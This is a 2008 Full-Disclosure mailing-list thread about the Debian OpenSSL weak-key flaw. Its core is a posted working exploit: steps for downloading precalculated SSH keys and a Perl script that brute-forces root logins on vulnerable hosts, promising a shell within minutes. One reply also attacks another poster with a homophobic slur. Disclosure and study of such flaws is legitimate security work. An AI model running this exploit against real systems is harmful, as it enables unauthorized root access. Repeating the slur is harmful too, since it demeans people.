Why reinvent the wheel? On Mon, May 19, 2008 at 6:20 AM, reepex <[EMAIL PROTECTED]> wrote: > why don't you code it yourself instead of being a script kiddie faggot. and > don't use ";-)" to look cool when you beg for warez. > > On Sun, May 18, 2008 at 10:13 AM, bob harley <[EMAIL PROTECTED]> wrote: >> >> Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing >> nicely ;-) >> >> On Thu, May 15, 2008 at 2:35 AM, Markus Müller <[EMAIL PROTECTED]> wrote: >>> >>> Hi full-disclosure, >>> >>> the debian openssl issue leads that there are only 65.536 possible ssh >>> keys generated, cause the only entropy is the pid of the process >>> generating the key. >>> >>> This leads to that the following perl script can be used with the >>> precalculated ssh keys to brute force the ssh login. It works if such a >>> keys is installed on a non-patched debian or any other system manual >>> configured to. >>> >>> On an unpatched system, which doesn't need to be debian, do the >>> following: >>> >>> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2 >>> >>> 2. Extract it to a directory >>> >>> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 >>> Bits, generated on an upatched debian (this is the key this exploit will >>> break) >>> >>> 4. Run the perl script and give it the location to where you extracted >>> the bzip2 mentioned. >>> >>> #!/usr/bin/perl >>> my $keysPerConnect = 6; >>> unless ($ARGV[1]) { >>> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n"; >>> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n"; >>> print "By [EMAIL PROTECTED]"; >>> exit 0; >>> } >>> chdir($ARGV[0]); >>> opendir(A, $ARGV[0]) || die("opendir"); >>> while ($_ = readdir(A)) { >>> chomp; >>> next unless m,^\d+$,; >>> push(@a, $_); >>> if (scalar(@a) > $keysPerConnect) { >>> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i >>> ".$_ } @a)." ".$ARGV[1]); >>> @a = (); >>> } >>> } >>> >>> 5. Enjoy the shell after some minutes (less than 20 minutes) >>> >>> Regards, >>> Markus Mueller >>> [EMAIL PROTECTED] >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
-- Ronald van der Westen _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
